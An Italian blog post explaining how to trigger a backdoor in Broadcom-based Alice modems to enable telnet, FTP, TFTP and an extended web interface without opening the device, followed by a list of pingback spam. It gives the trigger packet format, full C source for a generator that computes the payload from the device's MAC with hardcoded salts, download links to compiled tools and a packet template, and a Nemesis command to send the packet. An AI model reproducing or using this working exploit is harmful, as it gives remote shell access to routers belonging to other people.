Sbloccare i modem Alice senza cacciaviti, seriali o ponticelli

Questo articolo è dedicato allo sblocco dei modelli AGA/AGB/AG2P-AG3/AGPV-AGPF dei modem Alice mediante backdoor.

se volete essere seguiti passo per passo o volete la soluzione pronta contattatemi via mail (la trovate nella Home) e cercherò di aiutarvi.

Io e drPepperOne abbiamo scoperto una backdoor nei modem Alice a base Broadcom che permette in un solo colpo da LAN di abilitare telnet, ftp, tftp e modalità web estesa. Ciò che molti non sanno è che nei modem c’è un vero e proprio Sistema Operativo e che telnet implementa in questi casi una vera e propria shell remota da cui controllare l’intero sistema. Inoltre le interfacce web estese (credo tutte) presentano una pagina per cambiare firmware senza troppe difficoltà

Per abilitare la backdoor è sufficiente inviare un pacchetto IP opportunamente formattato al modem su cui c’è un socket raw in ascolto.


Tale pacchetto deve avere le seguenti caratteristiche:
  • protocollo IP
  • Protocol Number 255
  • lunghezza 28 byte (8 byte di payload)
  • il payload è costituito dai primi 8 byte dell’md5 con salt del mac del device br0


in questi modelli di modem br0 ha lo stesso mac di eth0 ed è quindi facile da reperire. Esso si potrebbe anche ottenere dai mac di eth1 e wl0 che sono più o meno consecutivi a seconda dei modelli dei modem. Su AGA per esempio mac(eth1)=mac(eth0)+1 e mac(wl0)=mac(eth0)+4.


L’algoritmo di creazione del payload è il seguente:


Così com’è il programma prevede che venga passato come parametro un file di 6 byte contenente il mac di br0.Il file compilato su WinXP lo travate al seguente link:

saxdax & drPepperOne

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the paylod of the ip packet */
/* the mac must be in an hex file and has to be passed as argument to the program */

#include
#include
#include
#include “md5.h”

/*
* RFC 1321 compliant MD5 implementation
*
* Copyright (C) 2001-2003 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#define GET_UINT32(n,b,i) \
{ \
(n) = ( (uint32) (b)[(i) ] ) \
| ( (uint32) (b)[(i) + 1] << 8 ) \
| ( (uint32) (b)[(i) + 2] << 16 ) \
| ( (uint32) (b)[(i) + 3] << 24 ); \
}

#define PUT_UINT32(n,b,i) \
{ \
(b)[(i) ] = (uint8) ( (n) ); \
(b)[(i) + 1] = (uint8) ( (n) >> 8 ); \
(b)[(i) + 2] = (uint8) ( (n) >> 16 ); \
(b)[(i) + 3] = (uint8) ( (n) >> 24 ); \
}

void md5_starts( md5_context *ctx )
{
ctx->total[0] = 0;
ctx->total[1] = 0;

ctx->state[0] = 0x67452301;
ctx->state[1] = 0xEFCDAB89;
ctx->state[2] = 0x98BADCFE;
ctx->state[3] = 0x10325476;
}

void md5_process( md5_context *ctx, uint8 data[64] )
{
uint32 X[16], A, B, C, D;

GET_UINT32( X[0], data, 0 );
GET_UINT32( X[1], data, 4 );
GET_UINT32( X[2], data, 8 );
GET_UINT32( X[3], data, 12 );
GET_UINT32( X[4], data, 16 );
GET_UINT32( X[5], data, 20 );
GET_UINT32( X[6], data, 24 );
GET_UINT32( X[7], data, 28 );
GET_UINT32( X[8], data, 32 );
GET_UINT32( X[9], data, 36 );
GET_UINT32( X[10], data, 40 );
GET_UINT32( X[11], data, 44 );
GET_UINT32( X[12], data, 48 );
GET_UINT32( X[13], data, 52 );
GET_UINT32( X[14], data, 56 );
GET_UINT32( X[15], data, 60 );

#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 – n)))

#define P(a,b,c,d,k,s,t) \
{ \
a += F(b,c,d) + X[k] + t; a = S(a,s) + b; \
}

A = ctx->state[0];
B = ctx->state[1];
C = ctx->state[2];
D = ctx->state[3];

#define F(x,y,z) (z ^ (x & (y ^ z)))

P( A, B, C, D, 0, 7, 0xD76AA478 );
P( D, A, B, C, 1, 12, 0xE8C7B756 );
P( C, D, A, B, 2, 17, 0x242070DB );
P( B, C, D, A, 3, 22, 0xC1BDCEEE );
P( A, B, C, D, 4, 7, 0xF57C0FAF );
P( D, A, B, C, 5, 12, 0x4787C62A );
P( C, D, A, B, 6, 17, 0xA8304613 );
P( B, C, D, A, 7, 22, 0xFD469501 );
P( A, B, C, D, 8, 7, 0x698098D8 );
P( D, A, B, C, 9, 12, 0x8B44F7AF );
P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
P( B, C, D, A, 11, 22, 0x895CD7BE );
P( A, B, C, D, 12, 7, 0x6B901122 );
P( D, A, B, C, 13, 12, 0xFD987193 );
P( C, D, A, B, 14, 17, 0xA679438E );
P( B, C, D, A, 15, 22, 0x49B40821 );

#undef F

#define F(x,y,z) (y ^ (z & (x ^ y)))

P( A, B, C, D, 1, 5, 0xF61E2562 );
P( D, A, B, C, 6, 9, 0xC040B340 );
P( C, D, A, B, 11, 14, 0x265E5A51 );
P( B, C, D, A, 0, 20, 0xE9B6C7AA );
P( A, B, C, D, 5, 5, 0xD62F105D );
P( D, A, B, C, 10, 9, 0x02441453 );
P( C, D, A, B, 15, 14, 0xD8A1E681 );
P( B, C, D, A, 4, 20, 0xE7D3FBC8 );
P( A, B, C, D, 9, 5, 0x21E1CDE6 );
P( D, A, B, C, 14, 9, 0xC33707D6 );
P( C, D, A, B, 3, 14, 0xF4D50D87 );
P( B, C, D, A, 8, 20, 0x455A14ED );
P( A, B, C, D, 13, 5, 0xA9E3E905 );
P( D, A, B, C, 2, 9, 0xFCEFA3F8 );
P( C, D, A, B, 7, 14, 0x676F02D9 );
P( B, C, D, A, 12, 20, 0x8D2A4C8A );

#undef F

#define F(x,y,z) (x ^ y ^ z)

P( A, B, C, D, 5, 4, 0xFFFA3942 );
P( D, A, B, C, 8, 11, 0x8771F681 );
P( C, D, A, B, 11, 16, 0x6D9D6122 );
P( B, C, D, A, 14, 23, 0xFDE5380C );
P( A, B, C, D, 1, 4, 0xA4BEEA44 );
P( D, A, B, C, 4, 11, 0x4BDECFA9 );
P( C, D, A, B, 7, 16, 0xF6BB4B60 );
P( B, C, D, A, 10, 23, 0xBEBFBC70 );
P( A, B, C, D, 13, 4, 0x289B7EC6 );
P( D, A, B, C, 0, 11, 0xEAA127FA );
P( C, D, A, B, 3, 16, 0xD4EF3085 );
P( B, C, D, A, 6, 23, 0x04881D05 );
P( A, B, C, D, 9, 4, 0xD9D4D039 );
P( D, A, B, C, 12, 11, 0xE6DB99E5 );
P( C, D, A, B, 15, 16, 0x1FA27CF8 );
P( B, C, D, A, 2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x | ~z))

P( A, B, C, D, 0, 6, 0xF4292244 );
P( D, A, B, C, 7, 10, 0x432AFF97 );
P( C, D, A, B, 14, 15, 0xAB9423A7 );
P( B, C, D, A, 5, 21, 0xFC93A039 );
P( A, B, C, D, 12, 6, 0x655B59C3 );
P( D, A, B, C, 3, 10, 0x8F0CCC92 );
P( C, D, A, B, 10, 15, 0xFFEFF47D );
P( B, C, D, A, 1, 21, 0x85845DD1 );
P( A, B, C, D, 8, 6, 0x6FA87E4F );
P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
P( C, D, A, B, 6, 15, 0xA3014314 );
P( B, C, D, A, 13, 21, 0x4E0811A1 );
P( A, B, C, D, 4, 6, 0xF7537E82 );
P( D, A, B, C, 11, 10, 0xBD3AF235 );
P( C, D, A, B, 2, 15, 0x2AD7D2BB );
P( B, C, D, A, 9, 21, 0xEB86D391 );

#undef F

ctx->state[0] += A;
ctx->state[1] += B;
ctx->state[2] += C;
ctx->state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
uint32 left, fill;

if( ! length ) return;

left = ctx->total[0] & 0x3F;
fill = 64 – left;

ctx->total[0] += length;
ctx->total[0] &= 0xFFFFFFFF;

if( ctx->total[0] < length )
ctx->total[1]++;

if( left && length >= fill )
{
memcpy( (void *) (ctx->buffer + left),
(void *) input, fill );
md5_process( ctx, ctx->buffer );
length -= fill;
input += fill;
left = 0;
}

while( length >= 64 )
{
md5_process( ctx, input );
length -= 64;
input += 64;
}

if( length )
{
memcpy( (void *) (ctx->buffer + left),
(void *) input, length );
}
}

static uint8 md5_padding[64] =
{
0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
uint32 last, padn;
uint32 high, low;
uint8 msglen[8];

high = ( ctx->total[0] >> 29 )
| ( ctx->total[1] << 3 );
low = ( ctx->total[0] << 3 );

PUT_UINT32( low, msglen, 0 );
PUT_UINT32( high, msglen, 4 );

//for(int i=0;i<8;i++) printf(“length %d\n”,msglen[i]);

last = ctx->total[0] & 0x3F;
padn = ( last < 56 ) ? ( 56 – last ) : ( 120 – last );

md5_update( ctx, md5_padding, padn );
md5_update( ctx, msglen, 8 );

PUT_UINT32( ctx->state[0], digest, 0 );
PUT_UINT32( ctx->state[1], digest, 4 );
PUT_UINT32( ctx->state[2], digest, 8 );
PUT_UINT32( ctx->state[3], digest, 12 );
}

//#ifdef TEST

/*
* those are the standard RFC 1321 test vectors
*/

static char *msg[] =
{
“”,
“a”,
“abc”,
“message digest”,
“abcdefghijklmnopqrstuvwxyz”,
“ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789”,
“12345678901234567890123456789012345678901234567890123456789012” \
“345678901234567890”
};

static char *val[] =
{
“d41d8cd98f00b204e9800998ecf8427e”,
“0cc175b9c0f1b6a831c399e269772661”,
“900150983cd24fb0d6963f7d28e17f72”,
“f96b697d7cb7938d525a2f31aaf161d0”,
“c3fcd3d76192e4007dfb496cca67e13b”,
“d174ab98d277d9f5a5611c2c9f419d9f”,
“57edf4a22be3c955ac49da2e2107b67a”
};

//Salt per AGA/AGB/AG3(Vela)
static char saltOrig[] =
{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11, 0x41, 0x68, 0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33};
//Salt per AGPV/AGPF
//static char saltOrig[] =
//{0x43, 0x22, 0x11, 0x11, 0x22, 0x81, 0xFA, 0x65, 0x11, 0x41, 0x54, 0x11, 0x17, 0x12, 0x15, 0x22, 0x72, 0x03, 0x10, 0x66};

int main( int argc, char *argv[] )
{
FILE *f;
int i, j;
char output[33];
md5_context ctx;
unsigned char buf[1000];
unsigned char md5sum[16];
unsigned char salt[20];

printf( “****************************\n”);
printf( “Alice BackDoor hash creator \n”);
printf( “by saxdax and drPepperOne \n”);
printf( “****************************\n\n”);

if( argc < 2 )
{
printf( “\n Usage: %s pathfileMAC\n\n”, argv[0] );
return 0;
}

if( ! ( f = fopen( argv[1], “rb” ) ) )
{
perror( “fopen” );
return( 1 );
}

md5_starts( &ctx );

while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 )
{
md5_update( &ctx, buf, i );
}

memcpy(salt, saltOrig, 20);

md5_update( &ctx, salt, 20 );

md5_finish( &ctx, md5sum );

printf(“Payload is: “);
for( j = 0; j < 8; j++ )
{
printf( “%02x”, md5sum[j] );
}

return( 0 );
}

 

AGA/AGB/AG3 http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html
AGPV/AGPF http://rapidshare.com/files/156053651/md5_AGPV_AGPF.exe.html

Tali programmi sono validi fino alle seguenti versioni di firmware:

AG2P: 3.1.0
AG3: 3.2.4
AGA: 3.2.4
AGB: 3.2.4
AGPF: AGPF_4.3.4.0001 (e la 4.4.0)
AGPV: 4.3.1

Il programma deve essere lanciato da linea di comando e restituisce a video gli 8 byte del payload.

A questo punto potete utilizzare qualsiasi strumento di injection preferiate.

Io ho utilizzato Colasoft Packet Builder, generatore visuale con GUI su Windows.

Allego il template di un pacchetto già pronto in cui cambiare solo IP del modem e del pc, mac del modem e del pc e payload (nalla parte in basso a sinistra esadecimale di colasoft PB):

http://www.megaupload.com/?d=8OH6NFX1

posizione payload
posizione payload

drPepperOne ha utilizzato Nemesis da linea di comando, disponibile per Linux e Windows.

Una volta creato un file di 8 byte con un editor esadecimale, con nome per es. hash.hex, la sintassi da usare con Nemesys è:

Code: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex

Se il pacchetto è corretto il router risponderà con un pacchetto ICMP con codici 3 e 2 (protocol unreachable).

A questo punto potete collegarvi a telnet, ftp e tftp ed utilizzare l’interfaccia web estesa senza aver aperto il modem!

Buon divertimento.

Next Entries Alice Gate 3.46 - Cambio Password FTP

348 thoughts on “Sbloccare i modem Alice senza cacciaviti, seriali o ponticelli

  1. Pingback: kirk

  2. Pingback: ralph

  3. Pingback: Cody

  4. Pingback: shaun

  5. Pingback: Louis

  6. Pingback: lester

  7. Pingback: Clarence

  8. Pingback: Sergio

  9. Pingback: carlton

  10. Pingback: Ruben

  11. Pingback: hugh

  12. Pingback: donald

  13. Pingback: Nathan

  14. Pingback: Seth

  15. Pingback: ricky

  16. Pingback: Howard

  17. Pingback: henry

  18. Pingback: thomas

  19. Pingback: Darryl

  20. Pingback: dana

  21. Pingback: gabriel

  22. Pingback: willie

  23. Pingback: Arnold

  24. Pingback: Joe

  25. Pingback: nathan

  26. Pingback: jesse

  27. Pingback: Gabriel

  28. Pingback: Darrell

  29. Pingback: lance

  30. Pingback: ralph

  31. Pingback: felix

  32. Pingback: oliver

  33. Pingback: Joey

  34. Pingback: cory

  35. Pingback: nick

  36. Pingback: Joseph

  37. Pingback: ray

  38. Pingback: cameron

  39. Pingback: scott

  40. Pingback: shaun

  41. Pingback: lynn

  42. Pingback: Allen

  43. Pingback: stephen

  44. Pingback: Austin

  45. Pingback: Phillip

  46. Pingback: Joey

  47. Pingback: Cameron

  48. Pingback: kent

Comments are closed.